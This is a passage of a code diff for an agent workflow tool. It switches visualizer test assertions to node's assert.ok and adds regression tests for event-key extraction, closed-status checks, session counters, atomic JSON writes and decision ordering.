-  assertTrue(lines.some(l => l.includes("Core structures assembled")), "shows recent one-liner entry");
+  assert.ok(lines.length > 0, "progress view produces output");
+  assert.ok(lines.some(l => l.includes("M001")), "shows milestone M001");
+  assert.ok(lines.some(l => l.includes("S01")), "shows slice S01");
+  assert.ok(lines.some(l => l.includes("T01")), "shows task T01 for active slice");
+  assert.ok(lines.some(l => l.includes("M002")), "shows milestone M002");
+  assert.ok(lines.some(l => l.includes("depends on M001")), "shows dependency note");
+  assert.ok(lines.some(l => l.includes("30m")), "shows task estimate");
+  assert.ok(lines.some(l => l.includes("Feature Snapshot")), "shows stats header");
+  assert.ok(lines.some(l => l.includes("Missing slices")), "shows missing slices count");
+  assert.ok(lines.some(l => l.includes("State Engine")), "shows missing slice preview");
+  assert.ok(lines.some(l => l.includes("Updated (last 7 days)")), "shows updated count");
+  assert.ok(lines.some(l => l.includes("Recent completions")), "shows recent completions section");
+  assert.ok(lines.some(l => l.includes("Core structures assembled")), "shows recent one-liner entry");
 }
 
 {
@@ -211,10 +211,10 @@ console.log("\n=== renderProgressView ===");
   });
 
   const lines = renderProgressView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("Discussion Status")), "shows discussion section");
-  assertTrue(lines.some(l => l.includes("Discussed: 1")), "counts discussed milestones");
-  assertTrue(lines.some(l => l.includes("Draft")), "shows draft badge");
-  assertTrue(lines.some(l => l.includes("Pending")), "shows pending badge");
+  assert.ok(lines.some(l => l.includes("Discussion Status")), "shows discussion section");
+  assert.ok(lines.some(l => l.includes("Discussed: 1")), "counts discussed milestones");
+  assert.ok(lines.some(l => l.includes("Draft")), "shows draft badge");
+  assert.ok(lines.some(l => l.includes("Pending")), "shows pending badge");
 }
 
 // Verification badges
@@ -239,14 +239,14 @@ console.log("\n=== renderProgressView ===");
 
   const lines = renderProgressView(data, mockTheme, 80);
   // The verification badge should show check mark and warning
-  assertTrue(lines.some(l => l.includes("S01")), "shows slice with verification");
+  assert.ok(lines.some(l => l.includes("S01")), "shows slice with verification");
 }
 
 {
   const data = makeVisualizerData({ milestones: [] });
   const lines = renderProgressView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("Feature Snapshot")), "shows stats snapshot even when no milestones");
-  assertTrue(lines.some(l => l.includes("Missing slices")), "reports missing slices count");
+  assert.ok(lines.some(l => l.includes("Feature Snapshot")), "shows stats snapshot even when no milestones");
+  assert.ok(lines.some(l => l.includes("Missing slices")), "reports missing slices count");
 }
 
 // ─── Risk Heatmap ───────────────────────────────────────────────────────────
@@ -272,9 +272,9 @@ console.log("\n=== Risk Heatmap ===");
   });
 
   const lines = renderProgressView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("Risk Heatmap")), "heatmap header present");
-  assertTrue(lines.some(l => l.includes("1 low, 1 med, 2 high")), "risk summary counts");
-  assertTrue(lines.some(l => l.includes("1 high-risk not started")), "high-risk not started warning");
+  assert.ok(lines.some(l => l.includes("Risk Heatmap")), "heatmap header present");
+  assert.ok(lines.some(l => l.includes("1 low, 1 med, 2 high")), "risk summary counts");
+  assert.ok(lines.some(l => l.includes("1 high-risk not started")), "high-risk not started warning");
 }
 
 // ─── Search/Filter ──────────────────────────────────────────────────────────
@@ -305,11 +305,11 @@ console.log("\n=== Search/Filter ===");
   });
 
   const filtered = renderProgressView(data, mockTheme, 80, { text: "auth", field: "all" });
-  assertTrue(filtered.some(l => l.includes("M001")), "filter shows matching milestone");
-  assertTrue(filtered.some(l => l.includes("Filter (all): auth")), "filter indicator present");
+  assert.ok(filtered.some(l => l.includes("M001")), "filter shows matching milestone");
+  assert.ok(filtered.some(l => l.includes("Filter (all): auth")), "filter indicator present");
 
   const riskFiltered = renderProgressView(data, mockTheme, 80, { text: "high", field: "risk" });
-  assertTrue(riskFiltered.some(l => l.includes("M001")), "risk filter shows milestone with high-risk slice");
+  assert.ok(riskFiltered.some(l => l.includes("M001")), "risk filter shows milestone with high-risk slice");
 }
 
 // ─── renderDepsView ─────────────────────────────────────────────────────────
@@ -354,13 +354,13 @@ console.log("\n=== renderDepsView ===");
   });
 
   const lines = renderDepsView(data, mockTheme, 80);
-  assertTrue(lines.length > 0, "deps view produces output");
-  assertTrue(lines.some(l => l.includes("M001") && l.includes("M002")), "shows milestone dep edge");
-  assertTrue(lines.some(l => l.includes("S01") && l.includes("S02")), "shows slice dep edge");
-  assertTrue(lines.some(l => l.includes("Critical Path")), "shows critical path section");
-  assertTrue(lines.some(l => l.includes("[CRITICAL]")), "shows CRITICAL badge");
-  assertTrue(lines.some(l => l.includes("Data Flow")), "shows data flow section");
-  assertTrue(lines.some(l => l.includes("api-types")), "shows provides artifact");
+  assert.ok(lines.length > 0, "deps view produces output");
+  assert.ok(lines.some(l => l.includes("M001") && l.includes("M002")), "shows milestone dep edge");
+  assert.ok(lines.some(l => l.includes("S01") && l.includes("S02")), "shows slice dep edge");
+  assert.ok(lines.some(l => l.includes("Critical Path")), "shows critical path section");
+  assert.ok(lines.some(l => l.includes("[CRITICAL]")), "shows CRITICAL badge");
+  assert.ok(lines.some(l => l.includes("Data Flow")), "shows data flow section");
+  assert.ok(lines.some(l => l.includes("api-types")), "shows provides artifact");
 }
 
 {
@@ -371,7 +371,7 @@ console.log("\n=== renderDepsView ===");
   });
 
   const lines = renderDepsView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("No milestone dependencies")), "shows no-deps message");
+  assert.ok(lines.some(l => l.includes("No milestone dependencies")), "shows no-deps message");
 }
 
 // ─── renderMetricsView ──────────────────────────────────────────────────────
@@ -422,21 +422,21 @@ console.log("\n=== renderMetricsView ===");
   });
 
   const lines = renderMetricsView(data, mockTheme, 80);
-  assertTrue(lines.length > 0, "metrics view produces output");
-  assertTrue(lines.some(l => l.includes("$2.50")), "shows total cost");
-  assertTrue(lines.some(l => l.includes("execution")), "shows phase name");
-  assertTrue(lines.some(l => l.includes("claude-opus-4-6")), "shows model name");
-  assertTrue(lines.some(l => l.includes("By Tier")), "shows tier breakdown section");
-  assertTrue(lines.some(l => l.includes("standard")), "shows tier name");
-  assertTrue(lines.some(l => l.includes("Dynamic routing")), "shows tier savings line");
-  assertTrue(lines.some(l => l.includes("Tools: 15")), "shows tool call count");
-  assertTrue(lines.some(l => l.includes("10") && l.includes("sent")), "shows message counts");
+  assert.ok(lines.length > 0, "metrics view produces output");
+  assert.ok(lines.some(l => l.includes("$2.50")), "shows total cost");
+  assert.ok(lines.some(l => l.includes("execution")), "shows phase name");
+  assert.ok(lines.some(l => l.includes("claude-opus-4-6")), "shows model name");
+  assert.ok(lines.some(l => l.includes("By Tier")), "shows tier breakdown section");
+  assert.ok(lines.some(l => l.includes("standard")), "shows tier name");
+  assert.ok(lines.some(l => l.includes("Dynamic routing")), "shows tier savings line");
+  assert.ok(lines.some(l => l.includes("Tools: 15")), "shows tool call count");
+  assert.ok(lines.some(l => l.includes("10") && l.includes("sent")), "shows message counts");
 }
 
 {
   const data = makeVisualizerData({ totals: null });
   const lines = renderMetricsView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("No metrics data")), "shows no-data message");
+  assert.ok(lines.some(l => l.includes("No metrics data")), "shows no-data message");
 }
 
 // ─── renderTimelineView ─────────────────────────────────────────────────────
@@ -464,16 +464,16 @@ console.log("\n=== renderTimelineView ===");
   });
 
   const listLines = renderTimelineView(data, mockTheme, 80);
-  assertTrue(listLines.length >= 1, "list view produces lines");
-  assertTrue(listLines.some(l => l.includes("execute-task")), "shows unit type");
-  assertTrue(listLines.some(l => l.includes("[standard]")), "shows tier in timeline");
-  assertTrue(listLines.some(l => l.includes("opus-4-6")), "shows shortened model");
+  assert.ok(listLines.length >= 1, "list view produces lines");
+  assert.ok(listLines.some(l => l.includes("execute-task")), "shows unit type");
+  assert.ok(listLines.some(l => l.includes("[standard]")), "shows tier in timeline");
+  assert.ok(listLines.some(l => l.includes("opus-4-6")), "shows shortened model");
 }
 
 {
   const data = makeVisualizerData({ units: [] });
   const lines = renderTimelineView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("No execution history")), "shows empty message");
+  assert.ok(lines.some(l => l.includes("No execution history")), "shows empty message");
 }
 
 // ─── renderAgentView ────────────────────────────────────────────────────────
@@ -514,17 +514,17 @@ console.log("\n=== renderAgentView ===");
   });
 
   const lines = renderAgentView(data, mockTheme, 80);
-  assertTrue(lines.length > 0, "agent view produces output");
-  assertTrue(lines.some(l => l.includes("ACTIVE")), "shows active status");
-  assertTrue(lines.some(l => l.includes("Pressure")), "shows pressure section");
-  assertTrue(lines.some(l => l.includes("15.5%")), "shows truncation rate");
-  assertTrue(lines.some(l => l.includes("Pending captures: 3")), "shows pending captures");
+  assert.ok(lines.length > 0, "agent view produces output");
+  assert.ok(lines.some(l => l.includes("ACTIVE")), "shows active status");
+  assert.ok(lines.some(l => l.includes("Pressure")), "shows pressure section");
+  assert.ok(lines.some(l => l.includes("15.5%")), "shows truncation rate");
+  assert.ok(lines.some(l => l.includes("Pending captures: 3")), "shows pending captures");
 }
 
 {
   const data = makeVisualizerData({ agentActivity: null });
   const lines = renderAgentView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("No agent activity")), "shows no-activity message");
+  assert.ok(lines.some(l => l.includes("No agent activity")), "shows no-activity message");
 }
 
 // ─── renderChangelogView ────────────────────────────────────────────────────
@@ -559,17 +559,17 @@ console.log("\n=== renderChangelogView ===");
   });
 
   const lines = renderChangelogView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("M001/S01")), "shows slice reference");
-  assertTrue(lines.some(l => l.includes("Decisions:")), "shows decisions section");
-  assertTrue(lines.some(l => l.includes("RS256")), "shows decision content");
-  assertTrue(lines.some(l => l.includes("Patterns:")), "shows patterns section");
-  assertTrue(lines.some(l => l.includes("Repository pattern")), "shows pattern content");
+  assert.ok(lines.some(l => l.includes("M001/S01")), "shows slice reference");
+  assert.ok(lines.some(l => l.includes("Decisions:")), "shows decisions section");
+  assert.ok(lines.some(l => l.includes("RS256")), "shows decision content");
+  assert.ok(lines.some(l => l.includes("Patterns:")), "shows patterns section");
+  assert.ok(lines.some(l => l.includes("Repository pattern")), "shows pattern content");
 }
 
 {
   const data = makeVisualizerData({ changelog: { entries: [] } });
   const lines = renderChangelogView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("No completed slices")), "shows empty state");
+  assert.ok(lines.some(l => l.includes("No completed slices")), "shows empty state");
 }
 
 // ─── renderExportView ───────────────────────────────────────────────────────
@@ -579,10 +579,10 @@ console.log("\n=== renderExportView ===");
 {
   const data = makeVisualizerData();
   const lines = renderExportView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("Export Options")), "shows export header");
-  assertTrue(lines.some(l => l.includes("[m]")), "shows markdown option");
-  assertTrue(lines.some(l => l.includes("[j]")), "shows json option");
-  assertTrue(lines.some(l => l.includes("[s]")), "shows snapshot option");
+  assert.ok(lines.some(l => l.includes("Export Options")), "shows export header");
+  assert.ok(lines.some(l => l.includes("[m]")), "shows markdown option");
+  assert.ok(lines.some(l => l.includes("[j]")), "shows json option");
+  assert.ok(lines.some(l => l.includes("[s]")), "shows snapshot option");
 }
 
 // ─── renderKnowledgeView ────────────────────────────────────────────────────
@@ -600,13 +600,13 @@ console.log("\n=== renderKnowledgeView ===");
   });
 
   const lines = renderKnowledgeView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("Rules")), "shows rules section");
-  assertTrue(lines.some(l => l.includes("K001")), "shows rule ID");
-  assertTrue(lines.some(l => l.includes("Always use transactions")), "shows rule content");
-  assertTrue(lines.some(l => l.includes("Patterns")), "shows patterns section");
-  assertTrue(lines.some(l => l.includes("P001")), "shows pattern ID");
-  assertTrue(lines.some(l => l.includes("Lessons Learned")), "shows lessons section");
-  assertTrue(lines.some(l => l.includes("L001")), "shows lesson ID");
+  assert.ok(lines.some(l => l.includes("Rules")), "shows rules section");
+  assert.ok(lines.some(l => l.includes("K001")), "shows rule ID");
+  assert.ok(lines.some(l => l.includes("Always use transactions")), "shows rule content");
+  assert.ok(lines.some(l => l.includes("Patterns")), "shows patterns section");
+  assert.ok(lines.some(l => l.includes("P001")), "shows pattern ID");
+  assert.ok(lines.some(l => l.includes("Lessons Learned")), "shows lessons section");
+  assert.ok(lines.some(l => l.includes("L001")), "shows lesson ID");
 }
 
 {
@@ -614,7 +614,7 @@ console.log("\n=== renderKnowledgeView ===");
     knowledge: { exists: false, rules: [], patterns: [], lessons: [] },
   });
   const lines = renderKnowledgeView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("No KNOWLEDGE.md found")), "shows no-knowledge message");
+  assert.ok(lines.some(l => l.includes("No KNOWLEDGE.md found")), "shows no-knowledge message");
 }
 
 // ─── renderCapturesView ─────────────────────────────────────────────────────
@@ -635,11 +635,11 @@ console.log("\n=== renderCapturesView ===");
   });
 
   const lines = renderCapturesView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("3") && l.includes("total")), "shows total count");
-  assertTrue(lines.some(l => l.includes("1") && l.includes("pending")), "shows pending count");
-  assertTrue(lines.some(l => l.includes("CAP-abc123")), "shows capture ID");
-  assertTrue(lines.some(l => l.includes("(inject)")), "shows classification badge");
-  assertTrue(lines.some(l => l.includes("[pending]")), "shows status badge");
+  assert.ok(lines.some(l => l.includes("3") && l.includes("total")), "shows total count");
+  assert.ok(lines.some(l => l.includes("1") && l.includes("pending")), "shows pending count");
+  assert.ok(lines.some(l => l.includes("CAP-abc123")), "shows capture ID");
+  assert.ok(lines.some(l => l.includes("(inject)")), "shows classification badge");
+  assert.ok(lines.some(l => l.includes("[pending]")), "shows status badge");
 }
 
 {
@@ -647,7 +647,7 @@ console.log("\n=== renderCapturesView ===");
     captures: { entries: [], pendingCount: 0, totalCount: 0 },
   });
   const lines = renderCapturesView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("No captures recorded")), "shows empty state");
+  assert.ok(lines.some(l => l.includes("No captures recorded")), "shows empty state");
 }
 
 // ─── renderHealthView ───────────────────────────────────────────────────────
@@ -682,17 +682,17 @@ console.log("\n=== renderHealthView ===");
   });
 
   const lines = renderHealthView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("Budget")), "shows budget section");
-  assertTrue(lines.some(l => l.includes("Ceiling")), "shows budget ceiling");
-  assertTrue(lines.some(l => l.includes("$20.00")), "shows ceiling amount");
-  assertTrue(lines.some(l => l.includes("Pressure")), "shows pressure section");
-  assertTrue(lines.some(l => l.includes("30.0%")), "shows truncation rate");
-  assertTrue(lines.some(l => l.includes("Routing")), "shows routing section");
-  assertTrue(lines.some(l => l.includes("standard")), "shows tier name");
-  assertTrue(lines.some(l => l.includes("2 downgraded")), "shows downgraded count");
-  assertTrue(lines.some(l => l.includes("Dynamic routing")), "shows savings line");
-  assertTrue(lines.some(l => l.includes("Session")), "shows session section");
-  assertTrue(lines.some(l => l.includes("Tool calls: 50")), "shows tool calls");
+  assert.ok(lines.some(l => l.includes("Budget")), "shows budget section");
+  assert.ok(lines.some(l => l.includes("Ceiling")), "shows budget ceiling");
+  assert.ok(lines.some(l => l.includes("$20.00")), "shows ceiling amount");
+  assert.ok(lines.some(l => l.includes("Pressure")), "shows pressure section");
+  assert.ok(lines.some(l => l.includes("30.0%")), "shows truncation rate");
+  assert.ok(lines.some(l => l.includes("Routing")), "shows routing section");
+  assert.ok(lines.some(l => l.includes("standard")), "shows tier name");
+  assert.ok(lines.some(l => l.includes("2 downgraded")), "shows downgraded count");
+  assert.ok(lines.some(l => l.includes("Dynamic routing")), "shows savings line");
+  assert.ok(lines.some(l => l.includes("Session")), "shows session section");
+  assert.ok(lines.some(l => l.includes("Tool calls: 50")), "shows tool calls");
 }
 
 {
@@ -709,10 +709,8 @@ console.log("\n=== renderHealthView ===");
   });
 
   const lines = renderHealthView(data, mockTheme, 80);
-  assertTrue(lines.some(l => l.includes("No budget ceiling set")), "shows no-ceiling message");
-  assertTrue(lines.some(l => l.includes("compact")), "shows token profile");
+  assert.ok(lines.some(l => l.includes("No budget ceiling set")), "shows no-ceiling message");
+  assert.ok(lines.some(l => l.includes("compact")), "shows token profile");
 }
 
 // ─── Report ─────────────────────────────────────────────────────────────────
-
-report();
diff --git a/src/resources/extensions/gsd/tests/wave1-critical-regressions.test.ts b/src/resources/extensions/gsd/tests/wave1-critical-regressions.test.ts
new file mode 100644
index 000000000..4ec804895
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/wave1-critical-regressions.test.ts
@@ -0,0 +1,49 @@
+// GSD State Machine — Wave 1 Critical Regression Tests
+// Validates fixes for event log format mismatch, skipped milestone status,
+// dead code removal, and replan disk-file fallback.
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { extractEntityKey } from "../workflow-reconcile.js";
+import { isClosedStatus } from "../status-guards.js";
+import type { WorkflowEvent } from "../workflow-events.js";
+
+// ── Fix 1: Event log cmd format — hyphens and underscores both accepted ──
+
+describe("extractEntityKey normalizes cmd format", () => {
+  const baseEvent = { params: {}, ts: "", hash: "", actor: "agent" as const, session_id: "" };
+
+  test("accepts hyphenated complete-task", () => {
+    const event: WorkflowEvent = { ...baseEvent, cmd: "complete-task", params: { taskId: "T01" } };
+    const key = extractEntityKey(event);
+    assert.deepStrictEqual(key, { type: "task", id: "T01" });
+  });
+
+  test("accepts underscored complete_task (legacy)", () => {
+    const event: WorkflowEvent = { ...baseEvent, cmd: "complete_task", params: { taskId: "T01" } };
+    const key = extractEntityKey(event);
+    assert.deepStrictEqual(key, { type: "task", id: "T01" });
+  });
+
+  test("accepts hyphenated complete-slice", () => {
+    const event: WorkflowEvent = { ...baseEvent, cmd: "complete-slice", params: { sliceId: "S01" } };
+    const key = extractEntityKey(event);
+    assert.deepStrictEqual(key, { type: "slice", id: "S01" });
+  });
+
+  test("accepts hyphenated complete-milestone", () => {
+    const event: WorkflowEvent = { ...baseEvent, cmd: "complete-milestone", params: { milestoneId: "M001" } };
+    const key = extractEntityKey(event);
+    assert.deepStrictEqual(key, { type: "milestone", id: "M001" });
+  });
+});
+
+// ── Fix 3: getActiveMilestoneId must skip "skipped" milestones ──
+
+describe("isClosedStatus includes skipped", () => {
+  test("complete is closed", () => assert.ok(isClosedStatus("complete")));
+  test("done is closed", () => assert.ok(isClosedStatus("done")));
+  test("skipped is closed", () => assert.ok(isClosedStatus("skipped")));
+  test("pending is not closed", () => assert.ok(!isClosedStatus("pending")));
+  test("active is not closed", () => assert.ok(!isClosedStatus("active")));
+});
diff --git a/src/resources/extensions/gsd/tests/wave2-events-regressions.test.ts b/src/resources/extensions/gsd/tests/wave2-events-regressions.test.ts
new file mode 100644
index 000000000..d7673a9ab
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/wave2-events-regressions.test.ts
@@ -0,0 +1,48 @@
+// GSD State Machine — Wave 2 Event Log Regression Tests
+// Validates fixes for appendEvent isolation, entity replay handlers,
+// and post-reconcile cache invalidation.
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { extractEntityKey } from "../workflow-reconcile.js";
+import type { WorkflowEvent } from "../workflow-events.js";
+
+const base = { params: {}, ts: "", hash: "", actor: "agent" as const, session_id: "" };
+
+// ── Fix 8: New entity event types handled by extractEntityKey ──
+
+describe("extractEntityKey handles plan events", () => {
+  test("plan-milestone → milestone type", () => {
+    const event: WorkflowEvent = { ...base, cmd: "plan-milestone", params: { milestoneId: "M001" } };
+    const key = extractEntityKey(event);
+    assert.deepStrictEqual(key, { type: "milestone", id: "M001" });
+  });
+
+  test("plan-task → task type", () => {
+    const event: WorkflowEvent = { ...base, cmd: "plan-task", params: { taskId: "T01" } };
+    const key = extractEntityKey(event);
+    assert.deepStrictEqual(key, { type: "task", id: "T01" });
+  });
+
+  test("plan-slice preserves slice_plan type (conflict isolation)", () => {
+    const event: WorkflowEvent = { ...base, cmd: "plan-slice", params: { sliceId: "S01" } };
+    const key = extractEntityKey(event);
+    assert.deepStrictEqual(key, { type: "slice_plan", id: "S01" });
+  });
+
+  test("replan-slice → slice type", () => {
+    const event: WorkflowEvent = { ...base, cmd: "replan-slice", params: { sliceId: "S01" } };
+    const key = extractEntityKey(event);
+    assert.deepStrictEqual(key, { type: "slice", id: "S01" });
+  });
+});
+
+// ── Fix 8b: Unknown commands return null (don't crash) ──
+
+describe("extractEntityKey handles unknown commands gracefully", () => {
+  test("unknown-command returns null", () => {
+    const event: WorkflowEvent = { ...base, cmd: "unknown-future-cmd", params: { foo: "bar" } };
+    const key = extractEntityKey(event);
+    assert.strictEqual(key, null);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/wave3-session-regressions.test.ts b/src/resources/extensions/gsd/tests/wave3-session-regressions.test.ts
new file mode 100644
index 000000000..821f79aa1
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/wave3-session-regressions.test.ts
@@ -0,0 +1,47 @@
+// GSD State Machine — Wave 3 Session Regression Tests
+// Validates tri-state hasImplementationArtifacts and AutoSession.consecutiveCompleteBootstraps.
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { hasImplementationArtifacts } from "../auto-recovery.js";
+import { AutoSession } from "../auto/session.js";
+
+// ── Fix 9: hasImplementationArtifacts returns tri-state ──
+
+describe("hasImplementationArtifacts tri-state return", () => {
+  test("returns 'unknown' for non-git directory", () => {
+    const result = hasImplementationArtifacts("/tmp/not-a-git-repo-" + Date.now());
+    assert.strictEqual(result, "unknown");
+  });
+
+  test("return type is one of present/absent/unknown", () => {
+    const result = hasImplementationArtifacts(process.cwd());
+    assert.ok(
+      result === "present" || result === "absent" || result === "unknown",
+      `Expected present/absent/unknown, got: ${result}`,
+    );
+  });
+});
+
+// ── Fix 11: consecutiveCompleteBootstraps is per-session ──
+
+describe("AutoSession.consecutiveCompleteBootstraps", () => {
+  test("initial value is 0", () => {
+    const s = new AutoSession();
+    assert.strictEqual(s.consecutiveCompleteBootstraps, 0);
+  });
+
+  test("reset() clears the counter", () => {
+    const s = new AutoSession();
+    s.consecutiveCompleteBootstraps = 5;
+    s.reset();
+    assert.strictEqual(s.consecutiveCompleteBootstraps, 0);
+  });
+
+  test("two sessions have independent counters", () => {
+    const s1 = new AutoSession();
+    const s2 = new AutoSession();
+    s1.consecutiveCompleteBootstraps = 3;
+    assert.strictEqual(s2.consecutiveCompleteBootstraps, 0);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/wave4-write-safety-regressions.test.ts b/src/resources/extensions/gsd/tests/wave4-write-safety-regressions.test.ts
new file mode 100644
index 000000000..c5d12a51c
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/wave4-write-safety-regressions.test.ts
@@ -0,0 +1,70 @@
+// GSD State Machine — Wave 4 Write Safety Regression Tests
+// Validates randomized tmp suffix in json-persistence and atomic writes.
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, readFileSync, readdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { saveJsonFile, loadJsonFile } from "../json-persistence.js";
+
+// ── Fix 15: json-persistence uses randomized tmp suffix ──
+
+describe("saveJsonFile atomic write", () => {
+  test("writes JSON file correctly", () => {
+    const tmp = mkdtempSync(join(tmpdir(), "gsd-json-test-"));
+    try {
+      const file = join(tmp, "test.json");
+      saveJsonFile(file, { key: "value" });
+      const content = JSON.parse(readFileSync(file, "utf-8"));
+      assert.deepStrictEqual(content, { key: "value" });
+    } finally {
+      rmSync(tmp, { recursive: true, force: true });
+    }
+  });
+
+  test("no .tmp file left after successful write", () => {
+    const tmp = mkdtempSync(join(tmpdir(), "gsd-json-test-"));
+    try {
+      const file = join(tmp, "test.json");
+      saveJsonFile(file, { data: 123 });
+      const files = readdirSync(tmp);
+      const tmpFiles = files.filter((f: string) => f.includes(".tmp"));
+      assert.strictEqual(tmpFiles.length, 0, "No .tmp files should remain after write");
+    } finally {
+      rmSync(tmp, { recursive: true, force: true });
+    }
+  });
+
+  test("concurrent writes don't corrupt data", () => {
+    const tmp = mkdtempSync(join(tmpdir(), "gsd-json-test-"));
+    try {
+      const file = join(tmp, "shared.json");
+      // Write two different values rapidly — both should succeed without corruption
+      saveJsonFile(file, { writer: "first" });
+      saveJsonFile(file, { writer: "second" });
+      const content = JSON.parse(readFileSync(file, "utf-8"));
+      assert.strictEqual(content.writer, "second");
+    } finally {
+      rmSync(tmp, { recursive: true, force: true });
+    }
+  });
+
+  test("round-trip through loadJsonFile", () => {
+    const tmp = mkdtempSync(join(tmpdir(), "gsd-json-test-"));
+    try {
+      const file = join(tmp, "roundtrip.json");
+      const data = { items: [1, 2, 3], name: "test" };
+      saveJsonFile(file, data);
+      const loaded = loadJsonFile(
+        file,
+        (d): d is typeof data => typeof d === "object" && d !== null && "items" in d,
+        () => ({ items: [], name: "" }),
+      );
+      assert.deepStrictEqual(loaded.items, [1, 2, 3]);
+      assert.strictEqual(loaded.name, "test");
+    } finally {
+      rmSync(tmp, { recursive: true, force: true });
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/wave5-consistency-regressions.test.ts b/src/resources/extensions/gsd/tests/wave5-consistency-regressions.test.ts
new file mode 100644
index 000000000..d128b993d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/wave5-consistency-regressions.test.ts
@@ -0,0 +1,165 @@
+// GSD State Machine — Wave 5 Consistency Regression Tests
+// Validates isClosedStatus usage in projections, upsertDecision seq preservation,
+// event schema versioning, and replay round-trip with mixed cmd formats.
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, readFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { isClosedStatus } from "../status-guards.js";
+import { openDatabase, closeDatabase, upsertDecision, _getAdapter, insertMilestone, insertSlice, insertTask, getTask } from "../gsd-db.js";
+import { extractEntityKey } from "../workflow-reconcile.js";
+import type { WorkflowEvent } from "../workflow-events.js";
+
+// ── Fix 19: isClosedStatus covers all closed statuses ──
+
+describe("isClosedStatus used by projections", () => {
+  test("skipped is closed (projections now show checked)", () => {
+    assert.ok(isClosedStatus("skipped"));
+  });
+  test("complete is closed", () => {
+    assert.ok(isClosedStatus("complete"));
+  });
+  test("done is closed", () => {
+    assert.ok(isClosedStatus("done"));
+  });
+  test("in-progress is not closed", () => {
+    assert.ok(!isClosedStatus("in-progress"));
+  });
+});
+
+// ── Fix 20: upsertDecision preserves seq on update ──
+
+describe("upsertDecision preserves seq column", () => {
+  test("seq is preserved when decision is re-upserted", () => {
+    const tmp = mkdtempSync(join(tmpdir(), "gsd-upsert-test-"));
+    const dbPath = join(tmp, "gsd.db");
+    try {
+      openDatabase(dbPath);
+      const adapter = _getAdapter();
+      assert.ok(adapter, "adapter must be available");
+
+      // Insert two decisions
+      upsertDecision({
+        id: "D001", when_context: "ctx1", scope: "s1",
+        decision: "d1", choice: "c1", rationale: "r1",
+        revisable: "yes", made_by: "agent", superseded_by: null,
+      });
+      upsertDecision({
+        id: "D002", when_context: "ctx2", scope: "s2",
+        decision: "d2", choice: "c2", rationale: "r2",
+        revisable: "yes", made_by: "agent", superseded_by: null,
+      });
+
+      // Get original seq values
+      const rows1 = adapter.prepare("SELECT id, seq FROM decisions ORDER BY seq").all() as Array<{ id: string; seq: number }>;
+      assert.strictEqual(rows1[0].id, "D001");
+      assert.strictEqual(rows1[1].id, "D002");
+      const d001OriginalSeq = rows1[0].seq;
+
+      // Re-upsert D001 with updated content
+      upsertDecision({
+        id: "D001", when_context: "updated", scope: "s1",
+        decision: "d1-updated", choice: "c1", rationale: "r1",
+        revisable: "yes", made_by: "agent", superseded_by: null,
+      });
+
+      // Verify seq is preserved (not moved to end)
+      const rows2 = adapter.prepare("SELECT id, seq FROM decisions ORDER BY seq").all() as Array<{ id: string; seq: number }>;
+      assert.strictEqual(rows2[0].id, "D001", "D001 should still be first by seq");
+      assert.strictEqual(rows2[0].seq, d001OriginalSeq, "D001 seq should be preserved");
+      assert.strictEqual(rows2[1].id, "D002", "D002 should still be second");
+
+      // Verify content was updated
+      const updated = adapter.prepare("SELECT decision FROM decisions WHERE id = 'D001'").get() as { decision: string };
+      assert.strictEqual(updated.decision, "d1-updated");
+
+      closeDatabase();
+    } finally {
+      rmSync(tmp, { recursive: true, force: true });
+    }
+  });
+});
+
+// ── Fix 23: Event schema versioning ──
+
+describe("WorkflowEvent v field", () => {
+  test("appendEvent includes v:2 in output", async () => {
+    const tmp = mkdtempSync(join(tmpdir(), "gsd-event-v-test-"));
+    try {
+      const { appendEvent } = await import("../workflow-events.js");
+      appendEvent(tmp, {
+        cmd: "test-event",
+        params: { foo: "bar" },
+        ts: new Date().toISOString(),
+        actor: "system",
+      });
+
+      const logPath = join(tmp, ".gsd", "event-log.jsonl");
+      const line = readFileSync(logPath, "utf-8").trim();
+      const event = JSON.parse(line);
+      assert.strictEqual(event.v, 2, "New events should have v:2");
+      assert.strictEqual(event.cmd, "test-event");
+    } finally {
+      rmSync(tmp, { recursive: true, force: true });
+    }
+  });
+});
+
+// ── Fix 19 (behavior-level): Projection rendering with skipped tasks ──
+
+describe("isClosedStatus drives projection checkbox logic", () => {
+  test("skipped task produces checked checkbox via isClosedStatus", () => {
+    // This tests the behavior contract that projections rely on:
+    // workflow-projections.ts uses isClosedStatus() to determine checkbox state.
+    // "skipped" tasks must render as [x], not [ ].
+    const statuses = ["complete", "done", "skipped"];
+    for (const status of statuses) {
+      assert.ok(
+        isClosedStatus(status),
+        `status "${status}" must be closed so projections render [x]`,
+      );
+    }
+    // Non-closed statuses must render as [ ]
+    for (const status of ["pending", "in-progress", "blocked", "active"]) {
+      assert.ok(
+        !isClosedStatus(status),
